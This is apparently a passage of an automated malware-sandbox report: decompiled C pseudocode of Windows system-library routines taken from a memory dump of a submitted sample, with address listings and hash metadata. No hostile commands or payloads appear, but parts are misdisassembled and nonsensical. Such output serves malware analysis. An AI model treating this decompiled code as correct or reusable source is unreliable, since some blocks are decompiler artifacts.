                                                                                                            								_t314 = _t314 + 1;
                                                                                                            								if(_t314 >= _v48) {
                                                                                                            									goto L16;
                                                                                                            								} else {
                                                                                                            									_t303 = _v37;
                                                                                                            									goto L1;
                                                                                                            								}
                                                                                                            								goto L108;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					L56:
                                                                                                            					_t288 = 0x25;
                                                                                                            					asm("int 0x29");
                                                                                                            					asm("out 0x28, al");
                                                                                                            					 *_t288 =  *_t288 | _t237;
                                                                                                            					asm("o16 sub [ecx], cl");
                                                                                                            					_t238 = _t237 + _t331;
                                                                                                            					asm("daa");
                                                                                                            					 *_t288 =  *_t288 | _t238;
                                                                                                            					 *[es:ecx] =  *[es:ecx] | _t238;
                                                                                                            					_t324 = _t321 + 1;
                                                                                                            					 *_t288 =  *_t288 - _t288;
                                                                                                            					 *0x1f010926 =  *0x1f010926 + _t238;
                                                                                                            					_pop(_t279);
                                                                                                            					_t239 = _t238 | 0x09289401;
                                                                                                            					 *0x2010d5b =  *0x2010d5b + _t324;
                                                                                                            					 *_t288 =  *_t288 - _t288;
                                                                                                            					 *((intOrPtr*)(_t239 - 0x9fef6d8)) =  *((intOrPtr*)(_t239 - 0x9fef6d8)) + _t239;
                                                                                                            					asm("daa");
                                                                                                            					 *_t288 =  *_t288 | _t239;
                                                                                                            					_push(ds);
                                                                                                            					 *_t288 =  *_t288 - _t288;
                                                                                                            					 *((intOrPtr*)(_t324 + 0x28)) =  *((intOrPtr*)(_t324 + 0x28)) + _t288;
                                                                                                            					 *_t288 =  *_t288 | _t239;
                                                                                                            					asm("daa");
                                                                                                            					 *_t288 =  *_t288 | _t239;
                                                                                                            					asm("fcomp dword [ebx+0xd]");
                                                                                                            					 *((intOrPtr*)(_t239 +  &_a1546912005)) =  *((intOrPtr*)(_t239 +  &_a1546912005)) + _t324;
                                                                                                            					asm("int3");
                                                                                                            					asm("int3");
                                                                                                            					asm("int3");
                                                                                                            					asm("int3");
                                                                                                            					asm("int3");
                                                                                                            					asm("int3");
                                                                                                            					asm("int3");
                                                                                                            					asm("int3");
                                                                                                            					asm("int3");
                                                                                                            					asm("int3");
                                                                                                            					asm("int3");
                                                                                                            					asm("int3");
                                                                                                            					asm("int3");
                                                                                                            					asm("int3");
                                                                                                            					asm("int3");
                                                                                                            					asm("int3");
                                                                                                            					_push(0x20);
                                                                                                            					_push(0x113ff00);
                                                                                                            					E010BD08C(_t279, _t316, _t324);
                                                                                                            					_v44 =  *[fs:0x18];
                                                                                                            					_t317 = 0;
                                                                                                            					 *_a24 = 0;
                                                                                                            					_t280 = _a12;
                                                                                                            					__eflags = _t280;
                                                                                                            					if(_t280 == 0) {
                                                                                                            						_t243 = 0xc0000100;
                                                                                                            					} else {
                                                                                                            						_v8 = 0;
                                                                                                            						_t325 = 0xc0000100;
                                                                                                            						_v52 = 0xc0000100;
                                                                                                            						_t245 = 4;
                                                                                                            						while(1) {
                                                                                                            							_v40 = _t245;
                                                                                                            							__eflags = _t245;
                                                                                                            							if(_t245 == 0) {
                                                                                                            								break;
                                                                                                            							}
                                                                                                            							_t293 = _t245 * 0xc;
                                                                                                            							_v48 = _t293;
                                                                                                            							__eflags = _t280 -  *((intOrPtr*)(_t293 + 0x1041664));
                                                                                                            							if(__eflags <= 0) {
                                                                                                            								if(__eflags == 0) {
                                                                                                            									_t260 = E010AE5C0(_a8,  *((intOrPtr*)(_t293 + 0x1041668)), _t280);
                                                                                                            									_t331 = _t331 + 0xc;
                                                                                                            									__eflags = _t260;
                                                                                                            									if(__eflags == 0) {
                                                                                                            										_t325 = E010E51BE(_t280,  *((intOrPtr*)(_v48 + 0x104166c)), _a16, _t317, _t325, __eflags, _a20, _a24);
                                                                                                            										_v52 = _t325;
                                                                                                            										break;
                                                                                                            									} else {
                                                                                                            										_t245 = _v40;
                                                                                                            										goto L62;
                                                                                                            									}
                                                                                                            									goto L70;
                                                                                                            								} else {
                                                                                                            									L62:
                                                                                                            									_t245 = _t245 - 1;
                                                                                                            									continue;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							break;
                                                                                                            						}
                                                                                                            						_v32 = _t325;
                                                                                                            						__eflags = _t325;
                                                                                                            						if(_t325 < 0) {
                                                                                                            							__eflags = _t325 - 0xc0000100;
                                                                                                            							if(_t325 == 0xc0000100) {
                                                                                                            								_t289 = _a4;
                                                                                                            								__eflags = _t289;
                                                                                                            								if(_t289 != 0) {
                                                                                                            									_v36 = _t289;
                                                                                                            									__eflags =  *_t289 - _t317;
                                                                                                            									if( *_t289 == _t317) {
                                                                                                            										_t325 = 0xc0000100;
                                                                                                            										goto L76;
                                                                                                            									} else {
                                                                                                            										_t305 =  *((intOrPtr*)(_v44 + 0x30));
                                                                                                            										_t247 =  *((intOrPtr*)(_t305 + 0x10));
                                                                                                            										__eflags =  *((intOrPtr*)(_t247 + 0x48)) - _t289;
                                                                                                            										if( *((intOrPtr*)(_t247 + 0x48)) == _t289) {
                                                                                                            											__eflags =  *(_t305 + 0x1c);
                                                                                                            											if( *(_t305 + 0x1c) == 0) {
                                                                                                            												L106:
                                                                                                            												_t325 = E01092AE4( &_v36, _a8, _t280, _a16, _a20, _a24);
                                                                                                            												_v32 = _t325;
                                                                                                            												__eflags = _t325 - 0xc0000100;
                                                                                                            												if(_t325 != 0xc0000100) {
                                                                                                            													goto L69;
                                                                                                            												} else {
                                                                                                            													_t317 = 1;
                                                                                                            													_t289 = _v36;
                                                                                                            													goto L75;
                                                                                                            												}
                                                                                                            											} else {
                                                                                                            												_t250 = E01076600( *(_t305 + 0x1c));
                                                                                                            												__eflags = _t250;
                                                                                                            												if(_t250 != 0) {
                                                                                                            													goto L106;
                                                                                                            												} else {
                                                                                                            													_t289 = _a4;
                                                                                                            													goto L75;
                                                                                                            												}
                                                                                                            											}
                                                                                                            										} else {
                                                                                                            											L75:
                                                                                                            											_t325 = E01092C50(_t289, _a8, _t280, _a16, _a20, _a24, _t317);
                                                                                                            											L76:
                                                                                                            											_v32 = _t325;
                                                                                                            											goto L69;
                                                                                                            										}
                                                                                                            									}
                                                                                                            									goto L108;
                                                                                                            								} else {
                                                                                                            									E0107EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                                            									_v8 = 1;
                                                                                                            									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                                                                                            									_t325 = _a24;
                                                                                                            									_t257 = E01092AE4( &_v36, _a8, _t280, _a16, _a20, _t325);
                                                                                                            									_v32 = _t257;
                                                                                                            									__eflags = _t257 - 0xc0000100;
                                                                                                            									if(_t257 == 0xc0000100) {
                                                                                                            										_v32 = E01092C50(_v36, _a8, _t280, _a16, _a20, _t325, 1);
                                                                                                            									}
                                                                                                            									_v8 = _t317;
                                                                                                            									E01092ACB();
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            						L69:
                                                                                                            						_v8 = 0xfffffffe;
                                                                                                            						_t243 = _t325;
                                                                                                            					}
                                                                                                            					L70:
                                                                                                            					return E010BD0D1(_t243);
                                                                                                            				}
                                                                                                            				L108:
                                                                                                            			}
                                                                                                            0x010d5c5d
                                                                                                            0x010d5c60
                                                                                                            0x01092788
                                                                                                            0x01092788
                                                                                                            0x0109278b
                                                                                                            0x0109278e
                                                                                                            0x0109278e
                                                                                                            0x0109278e
                                                                                                            0x01092791
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01092756
                                                                                                            0x01092750
                                                                                                            0x00000000
                                                                                                            0x01092794
                                                                                                            0x01092794
                                                                                                            0x01092795
                                                                                                            0x01092798
                                                                                                            0x01092798
                                                                                                            0x00000000
                                                                                                            0x01092734
                                                                                                            0x0109272c
                                                                                                            0x01092700
                                                                                                            0x010925ef
                                                                                                            0x010925ef
                                                                                                            0x010925ef
                                                                                                            0x010925f2
                                                                                                            0x010925f8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010925fe
                                                                                                            0x00000000
                                                                                                            0x010928e6
                                                                                                            0x010928ec
                                                                                                            0x010928ef
                                                                                                            0x010928f5
                                                                                                            0x010928f8
                                                                                                            0x010928f8
                                                                                                            0x00000000
                                                                                                            0x010928f8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01092866
                                                                                                            0x01092866
                                                                                                            0x01092876
                                                                                                            0x01092879
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010927e0
                                                                                                            0x010927e7
                                                                                                            0x010927e9
                                                                                                            0x010927eb
                                                                                                            0x010d5afd
                                                                                                            0x00000000
                                                                                                            0x010d5afd
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01092633
                                                                                                            0x01092638
                                                                                                            0x0109263b
                                                                                                            0x0109263c
                                                                                                            0x0109263e
                                                                                                            0x01092640
                                                                                                            0x01092642
                                                                                                            0x01092647
                                                                                                            0x01092649
                                                                                                            0x0109264e
                                                                                                            0x01092650
                                                                                                            0x01092653
                                                                                                            0x01092659
                                                                                                            0x010926a2
                                                                                                            0x010926a7
                                                                                                            0x010926ac
                                                                                                            0x010926b2
                                                                                                            0x010d5b11
                                                                                                            0x010d5b15
                                                                                                            0x010d5b17
                                                                                                            0x00000000
                                                                                                            0x010926b8
                                                                                                            0x010926b8
                                                                                                            0x010926ba
                                                                                                            0x010927a6
                                                                                                            0x010927a6
                                                                                                            0x010927a9
                                                                                                            0x010927ab
                                                                                                            0x010927b9
                                                                                                            0x010927b9
                                                                                                            0x010927be
                                                                                                            0x010927c1
                                                                                                            0x010927c3
                                                                                                            0x010927c5
                                                                                                            0x010927c7
                                                                                                            0x010d5c74
                                                                                                            0x010d5c79
                                                                                                            0x010d5c79
                                                                                                            0x010927c7
                                                                                                            0x00000000
                                                                                                            0x010926c0
                                                                                                            0x010926c0
                                                                                                            0x010926c3
                                                                                                            0x010926c6
                                                                                                            0x010926c6
                                                                                                            0x010926c9
                                                                                                            0x010926c9
                                                                                                            0x00000000
                                                                                                            0x010926c9
                                                                                                            0x010926ba
                                                                                                            0x0109265b
                                                                                                            0x0109265b
                                                                                                            0x0109265e
                                                                                                            0x01092667
                                                                                                            0x0109266d
                                                                                                            0x01092677
                                                                                                            0x0109267c
                                                                                                            0x0109267f
                                                                                                            0x01092681
                                                                                                            0x010d5b49
                                                                                                            0x010d5b4e
                                                                                                            0x010927cd
                                                                                                            0x010927d0
                                                                                                            0x010927d1
                                                                                                            0x010927d2
                                                                                                            0x010927d4
                                                                                                            0x010927dd
                                                                                                            0x01092687
                                                                                                            0x01092687
                                                                                                            0x0109268a
                                                                                                            0x0109268b
                                                                                                            0x0109268e
                                                                                                            0x0109268f
                                                                                                            0x01092691
                                                                                                            0x01092696
                                                                                                            0x01092698
                                                                                                            0x0109269d
                                                                                                            0x0109269f
                                                                                                            0x00000000
                                                                                                            0x0109269f
                                                                                                            0x01092681
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01092846
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01092605
                                                                                                            0x0109260a
                                                                                                            0x0109260c
                                                                                                            0x01092611
                                                                                                            0x01092616
                                                                                                            0x01092619
                                                                                                            0x01092619
                                                                                                            0x0109261e
                                                                                                            0x00000000
                                                                                                            0x01092624
                                                                                                            0x01092627
                                                                                                            0x01092627
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d5b1f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01092894
                                                                                                            0x0109289b
                                                                                                            0x0109289d
                                                                                                            0x010928a1
                                                                                                            0x010d5b2b
                                                                                                            0x010d5b2e
                                                                                                            0x010d5b2e
                                                                                                            0x010928a7
                                                                                                            0x010928a9
                                                                                                            0x010d5b04
                                                                                                            0x010d5b09
                                                                                                            0x010d5b09
                                                                                                            0x010d5b09
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d5b35
                                                                                                            0x010d5b3c
                                                                                                            0x010928fb
                                                                                                            0x010928fb
                                                                                                            0x010926cc
                                                                                                            0x010926cc
                                                                                                            0x010926d0
                                                                                                            0x00000000
                                                                                                            0x010926d2
                                                                                                            0x010926d2
                                                                                                            0x00000000
                                                                                                            0x010926d2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010925fe
                                                                                                            0x0109292d
                                                                                                            0x0109292f
                                                                                                            0x01092930
                                                                                                            0x01092935
                                                                                                            0x01092937
                                                                                                            0x01092939
                                                                                                            0x0109293c
                                                                                                            0x0109293e
                                                                                                            0x0109293f
                                                                                                            0x01092941
                                                                                                            0x01092945
                                                                                                            0x01092946
                                                                                                            0x01092948
                                                                                                            0x0109294e
                                                                                                            0x0109294f
                                                                                                            0x01092954
                                                                                                            0x0109295a
                                                                                                            0x0109295c
                                                                                                            0x01092962
                                                                                                            0x01092963
                                                                                                            0x01092965
                                                                                                            0x01092966
                                                                                                            0x01092968
                                                                                                            0x0109296b
                                                                                                            0x0109296e
                                                                                                            0x0109296f
                                                                                                            0x01092971
                                                                                                            0x01092974
                                                                                                            0x01092980
                                                                                                            0x01092981
                                                                                                            0x01092982
                                                                                                            0x01092983
                                                                                                            0x01092984
                                                                                                            0x01092985
                                                                                                            0x01092986
                                                                                                            0x01092987
                                                                                                            0x01092988
                                                                                                            0x01092989
                                                                                                            0x0109298a
                                                                                                            0x0109298b
                                                                                                            0x0109298c
                                                                                                            0x0109298d
                                                                                                            0x0109298e
                                                                                                            0x0109298f
                                                                                                            0x01092990

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PATH
                                                                                                            • API String ID: 0-1036084923
                                                                                                            • Opcode ID: df81ce6f6333766a43880a936cd608cf6dd09776c5833853dc396a0b4064fa8d
                                                                                                            • Instruction ID: cb9b8f1e192965e11563226744908bfde11d42ad8c1c84cd670a171e3732a159
                                                                                                            • Opcode Fuzzy Hash: df81ce6f6333766a43880a936cd608cf6dd09776c5833853dc396a0b4064fa8d
                                                                                                            • Instruction Fuzzy Hash: FCC18CB1E00219EBDF24DF99D891BAEBBF1FF48710F444069E991BB250D734A941DBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 80%
                                                                                                            			E0109FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                                                                                            				char _v5;
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				char _v16;
                                                                                                            				char _v17;
                                                                                                            				char _v20;
                                                                                                            				signed int _v24;
                                                                                                            				char _v28;
                                                                                                            				char _v32;
                                                                                                            				signed int _v40;
                                                                                                            				void* __ecx;
                                                                                                            				void* __edi;
                                                                                                            				void* __ebp;
                                                                                                            				signed int _t73;
                                                                                                            				intOrPtr* _t75;
                                                                                                            				signed int _t77;
                                                                                                            				signed int _t79;
                                                                                                            				signed int _t81;
                                                                                                            				intOrPtr _t83;
                                                                                                            				intOrPtr _t85;
                                                                                                            				intOrPtr _t86;
                                                                                                            				signed int _t91;
                                                                                                            				signed int _t94;
                                                                                                            				signed int _t95;
                                                                                                            				signed int _t96;
                                                                                                            				signed int _t106;
                                                                                                            				signed int _t108;
                                                                                                            				signed int _t114;
                                                                                                            				signed int _t116;
                                                                                                            				signed int _t118;
                                                                                                            				signed int _t122;
                                                                                                            				signed int _t123;
                                                                                                            				void* _t129;
                                                                                                            				signed int _t130;
                                                                                                            				void* _t132;
                                                                                                            				intOrPtr* _t134;
                                                                                                            				signed int _t138;
                                                                                                            				signed int _t141;
                                                                                                            				signed int _t147;
                                                                                                            				intOrPtr _t153;
                                                                                                            				signed int _t154;
                                                                                                            				signed int _t155;
                                                                                                            				signed int _t170;
                                                                                                            				void* _t174;
                                                                                                            				signed int _t176;
                                                                                                            				signed int _t177;
                                                                                                            
                                                                                                            				_t129 = __ebx;
                                                                                                            				_push(_t132);
                                                                                                            				_push(__esi);
                                                                                                            				_t174 = _t132;
                                                                                                            				_t73 =  !( *( *(_t174 + 0x18)));
                                                                                                            				if(_t73 >= 0) {
                                                                                                            					L5:
                                                                                                            					return _t73;
                                                                                                            				} else {
                                                                                                            					E0107EEF0(0x1157b60);
                                                                                                            					_t134 =  *0x1157b84; // 0x77497b80
                                                                                                            					_t2 = _t174 + 0x24; // 0x24
                                                                                                            					_t75 = _t2;
                                                                                                            					if( *_t134 != 0x1157b80) {
                                                                                                            						_push(3);
                                                                                                            						asm("int 0x29");
                                                                                                            						asm("int3");
                                                                                                            						asm("int3");
                                                                                                            						asm("int3");
                                                                                                            						asm("int3");
                                                                                                            						asm("int3");
                                                                                                            						asm("int3");
                                                                                                            						asm("int3");
                                                                                                            						asm("int3");
                                                                                                            						asm("int3");
                                                                                                            						asm("int3");
                                                                                                            						asm("int3");
                                                                                                            						asm("int3");
                                                                                                            						asm("int3");
                                                                                                            						asm("int3");
                                                                                                            						asm("int3");
                                                                                                            						asm("int3");
                                                                                                            						asm("int3");
                                                                                                            						asm("int3");
                                                                                                            						asm("int3");
                                                                                                            						_push(0x1157b60);
                                                                                                            						_t170 = _v8;
                                                                                                            						_v28 = 0;
                                                                                                            						_v40 = 0;
                                                                                                            						_v24 = 0;
                                                                                                            						_v17 = 0;
                                                                                                            						_v32 = 0;
                                                                                                            						__eflags = _t170 & 0xffff7cf2;
                                                                                                            						if((_t170 & 0xffff7cf2) != 0) {
                                                                                                            							L43:
                                                                                                            							_t77 = 0xc000000d;
                                                                                                            						} else {
                                                                                                            							_t79 = _t170 & 0x0000000c;
                                                                                                            							__eflags = _t79;
                                                                                                            							if(_t79 != 0) {
                                                                                                            								__eflags = _t79 - 0xc;
                                                                                                            								if(_t79 == 0xc) {
                                                                                                            									goto L43;
                                                                                                            								} else {
                                                                                                            									goto L9;
                                                                                                            								}
                                                                                                            							} else {
                                                                                                            								_t170 = _t170 | 0x00000008;
                                                                                                            								__eflags = _t170;
                                                                                                            								L9:
                                                                                                            								_t81 = _t170 & 0x00000300;
                                                                                                            								__eflags = _t81 - 0x300;
                                                                                                            								if(_t81 == 0x300) {
                                                                                                            									goto L43;
                                                                                                            								} else {
                                                                                                            									_t138 = _t170 & 0x00000001;
                                                                                                            									__eflags = _t138;
                                                                                                            									_v24 = _t138;
                                                                                                            									if(_t138 != 0) {
                                                                                                            										__eflags = _t81;
                                                                                                            										if(_t81 != 0) {
                                                                                                            											goto L43;
                                                                                                            										} else {
                                                                                                            											goto L11;
                                                                                                            										}
                                                                                                            									} else {
                                                                                                            										L11:
                                                                                                            										_push(_t129);
                                                                                                            										_t77 = E01076D90( &_v20);
                                                                                                            										_t130 = _t77;
                                                                                                            										__eflags = _t130;
                                                                                                            										if(_t130 >= 0) {
                                                                                                            											_push(_t174);
                                                                                                            											__eflags = _t170 & 0x00000301;
                                                                                                            											if((_t170 & 0x00000301) == 0) {
                                                                                                            												_t176 = _a8;
                                                                                                            												__eflags = _t176;
                                                                                                            												if(__eflags == 0) {
                                                                                                            													L64:
                                                                                                            													_t83 =  *[fs:0x18];
                                                                                                            													_t177 = 0;
                                                                                                            													__eflags =  *(_t83 + 0xfb8);
                                                                                                            													if( *(_t83 + 0xfb8) != 0) {
                                                                                                            														E010776E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                                                                                            														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                                                                                            													}
                                                                                                            													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                                                                                            													goto L15;
                                                                                                            												} else {
                                                                                                            													asm("sbb edx, edx");
                                                                                                            													_t114 = E01108938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                                                                                            													__eflags = _t114;
                                                                                                            													if(_t114 < 0) {
                                                                                                            														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                                                                                            														E0106B150();
                                                                                                            													}
                                                                                                            													_t116 = E01106D81(_t176,  &_v16);
                                                                                                            													__eflags = _t116;
                                                                                                            													if(_t116 >= 0) {
                                                                                                            														__eflags = _v16 - 2;
                                                                                                            														if(_v16 < 2) {
                                                                                                            															L56:
                                                                                                            															_t118 = E010775CE(_v20, 5, 0);
                                                                                                            															__eflags = _t118;
                                                                                                            															if(_t118 < 0) {
                                                                                                            																L67:
                                                                                                            																_t130 = 0xc0000017;
                                                                                                            																goto L32;
                                                                                                            															} else {
                                                                                                            																__eflags = _v12;
                                                                                                            																if(_v12 == 0) {
                                                                                                            																	goto L67;
                                                                                                            																} else {
                                                                                                            																	_t153 =  *0x1158638; // 0x0
                                                                                                            																	_t122 = L010738A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                                                                                            																	_t154 = _v12;
                                                                                                            																	_t130 = _t122;
                                                                                                            																	__eflags = _t130;
                                                                                                            																	if(_t130 >= 0) {
                                                                                                            																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                                                                                            																		__eflags = _t123;
                                                                                                            																		if(_t123 != 0) {
                                                                                                            																			_t155 = _a12;
                                                                                                            																			__eflags = _t155;
                                                                                                            																			if(_t155 != 0) {
                                                                                                            																				 *_t155 = _t123;
                                                                                                            																			}
                                                                                                            																			goto L64;
                                                                                                            																		} else {
                                                                                                            																			E010776E2(_t154);
                                                                                                            																			goto L41;
                                                                                                            																		}
                                                                                                            																	} else {
                                                                                                            																		E010776E2(_t154);
                                                                                                            																		_t177 = 0;
                                                                                                            																		goto L18;
                                                                                                            																	}
                                                                                                            																}
                                                                                                            															}
                                                                                                            														} else {
                                                                                                            															__eflags =  *_t176;
                                                                                                            															if( *_t176 != 0) {
                                                                                                            																goto L56;
                                                                                                            															} else {
                                                                                                            																__eflags =  *(_t176 + 2);
                                                                                                            																if( *(_t176 + 2) == 0) {
                                                                                                            																	goto L64;
                                                                                                            																} else {
                                                                                                            																	goto L56;
                                                                                                            																}
                                                                                                            															}
                                                                                                            														}
                                                                                                            													} else {
                                                                                                            														_t130 = 0xc000000d;
                                                                                                            														goto L32;
                                                                                                            													}
                                                                                                            												}
                                                                                                            												goto L35;
                                                                                                            											} else {
                                                                                                            												__eflags = _a8;
                                                                                                            												if(_a8 != 0) {
                                                                                                            													_t77 = 0xc000000d;
                                                                                                            												} else {
                                                                                                            													_v5 = 1;
                                                                                                            													L0109FCE3(_v20, _t170);
                                                                                                            													_t177 = 0;
                                                                                                            													__eflags = 0;
                                                                                                            													L15:
                                                                                                            													_t85 =  *[fs:0x18];
                                                                                                            													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                                                                                            													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                                                                                            														L18:
                                                                                                            														__eflags = _t130;
                                                                                                            														if(_t130 != 0) {
                                                                                                            															goto L32;
                                                                                                            														} else {
                                                                                                            															__eflags = _v5 - _t130;
                                                                                                            															if(_v5 == _t130) {
                                                                                                            																goto L32;
                                                                                                            															} else {
                                                                                                            																_t86 =  *[fs:0x18];
                                                                                                            																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                                                                                            																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                                                                                            																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                                                                                            																}
                                                                                                            																__eflags = _t177;
                                                                                                            																if(_t177 == 0) {
                                                                                                            																	L31:
                                                                                                            																	__eflags = 0;
                                                                                                            																	L010770F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                                                                                            																	goto L32;
                                                                                                            																} else {
                                                                                                            																	__eflags = _v24;
                                                                                                            																	_t91 =  *(_t177 + 0x20);
                                                                                                            																	if(_v24 != 0) {
                                                                                                            																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                                                                                            																		goto L31;
                                                                                                            																	} else {
                                                                                                            																		_t141 = _t91 & 0x00000040;
                                                                                                            																		__eflags = _t170 & 0x00000100;
                                                                                                            																		if((_t170 & 0x00000100) == 0) {
                                                                                                            																			__eflags = _t141;
                                                                                                            																			if(_t141 == 0) {
                                                                                                            																				L74:
                                                                                                            																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                                                                                            																				goto L27;
                                                                                                            																			} else {
                                                                                                            																				_t177 = E0109FD22(_t177);
                                                                                                            																				__eflags = _t177;
                                                                                                            																				if(_t177 == 0) {
                                                                                                            																					goto L42;
                                                                                                            																				} else {
                                                                                                            																					_t130 = E0109FD9B(_t177, 0, 4);
                                                                                                            																					__eflags = _t130;
                                                                                                            																					if(_t130 != 0) {
                                                                                                            																						goto L42;
                                                                                                            																					} else {
                                                                                                            																						_t68 = _t177 + 0x20;
                                                                                                            																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                                                                                            																						__eflags =  *_t68;
                                                                                                            																						_t91 =  *(_t177 + 0x20);
                                                                                                            																						goto L74;
                                                                                                            																					}
                                                                                                            																				}
                                                                                                            																			}
                                                                                                            																			goto L35;
                                                                                                            																		} else {
                                                                                                            																			__eflags = _t141;
                                                                                                            																			if(_t141 != 0) {
                                                                                                            																				_t177 = E0109FD22(_t177);
                                                                                                            																				__eflags = _t177;
                                                                                                            																				if(_t177 == 0) {
                                                                                                            																					L42:
                                                                                                            																					_t77 = 0xc0000001;
                                                                                                            																					goto L33;
                                                                                                            																				} else {
                                                                                                            																					_t130 = E0109FD9B(_t177, 0, 4);
                                                                                                            																					__eflags = _t130;
                                                                                                            																					if(_t130 != 0) {
                                                                                                            																						goto L42;
                                                                                                            																					} else {
                                                                                                            																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                                                                                            																						_t91 =  *(_t177 + 0x20);
                                                                                                            																						goto L26;
                                                                                                            																					}
                                                                                                            																				}
                                                                                                            																				goto L35;
                                                                                                            																			} else {
                                                                                                            																				L26:
                                                                                                            																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                                                                                            																				__eflags = _t94;
                                                                                                            																				L27:
                                                                                                            																				 *(_t177 + 0x20) = _t94;
                                                                                                            																				__eflags = _t170 & 0x00008000;
                                                                                                            																				if((_t170 & 0x00008000) != 0) {
                                                                                                            																					_t95 = _a12;
                                                                                                            																					__eflags = _t95;
                                                                                                            																					if(_t95 != 0) {
                                                                                                            																						_t96 =  *_t95;
                                                                                                            																						__eflags = _t96;
                                                                                                            																						if(_t96 != 0) {
                                                                                                            																							 *((short*)(_t177 + 0x22)) = 0;
                                                                                                            																							_t40 = _t177 + 0x20;
                                                                                                            																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                                                                                            																							__eflags =  *_t40;
                                                                                                            																						}
                                                                                                            																					}
                                                                                                            																				}
                                                                                                            																				goto L31;
                                                                                                            																			}
                                                                                                            																		}
                                                                                                            																	}
                                                                                                            																}
                                                                                                            															}
                                                                                                            														}
                                                                                                            													} else {
                                                                                                            														_t147 =  *( *[fs:0x18] + 0xfc0);
                                                                                                            														_t106 =  *(_t147 + 0x20);
                                                                                                            														__eflags = _t106 & 0x00000040;
                                                                                                            														if((_t106 & 0x00000040) != 0) {
                                                                                                            															_t147 = E0109FD22(_t147);
                                                                                                            															__eflags = _t147;
                                                                                                            															if(_t147 == 0) {
                                                                                                            																L41:
                                                                                                            																_t130 = 0xc0000001;
                                                                                                            																L32:
                                                                                                            																_t77 = _t130;
                                                                                                            																goto L33;
                                                                                                            															} else {
                                                                                                            																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                                                                                            																_t106 =  *(_t147 + 0x20);
                                                                                                            																goto L17;
                                                                                                            															}
                                                                                                            															goto L35;
                                                                                                            														} else {
                                                                                                            															L17:
                                                                                                            															_t108 = _t106 | 0x00000080;
                                                                                                            															__eflags = _t108;
                                                                                                            															 *(_t147 + 0x20) = _t108;
                                                                                                            															 *( *[fs:0x18] + 0xfc0) = _t147;
                                                                                                            															goto L18;
                                                                                                            														}
                                                                                                            													}
                                                                                                            												}
                                                                                                            											}
                                                                                                            											L33:
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            						L35:
                                                                                                            						return _t77;
                                                                                                            					} else {
                                                                                                            						 *_t75 = 0x1157b80;
                                                                                                            						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                                                                                            						 *_t134 = _t75;
                                                                                                            						 *0x1157b84 = _t75;
                                                                                                            						_t73 = E0107EB70(_t134, 0x1157b60);
                                                                                                            						if( *0x1157b20 != 0) {
                                                                                                            							_t73 =  *( *[fs:0x30] + 0xc);
                                                                                                            							if( *((char*)(_t73 + 0x28)) == 0) {
                                                                                                            								_t73 = E0107FF60( *0x1157b20);
                                                                                                            							}
                                                                                                            						}
                                                                                                            						goto L5;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}

















































                                                                                                            0x0109fc4b
                                                                                                            0x0109fc4b
                                                                                                            0x0109fc4e
                                                                                                            0x0109fc4e
                                                                                                            0x0109fc51
                                                                                                            0x0109fc51
                                                                                                            0x0109fc54
                                                                                                            0x0109fc5a
                                                                                                            0x0109fc5c
                                                                                                            0x0109fc5f
                                                                                                            0x0109fc61
                                                                                                            0x0109fc63
                                                                                                            0x0109fc65
                                                                                                            0x0109fc67
                                                                                                            0x0109fc6e
                                                                                                            0x0109fc72
                                                                                                            0x0109fc72
                                                                                                            0x0109fc72
                                                                                                            0x0109fc72
                                                                                                            0x0109fc67
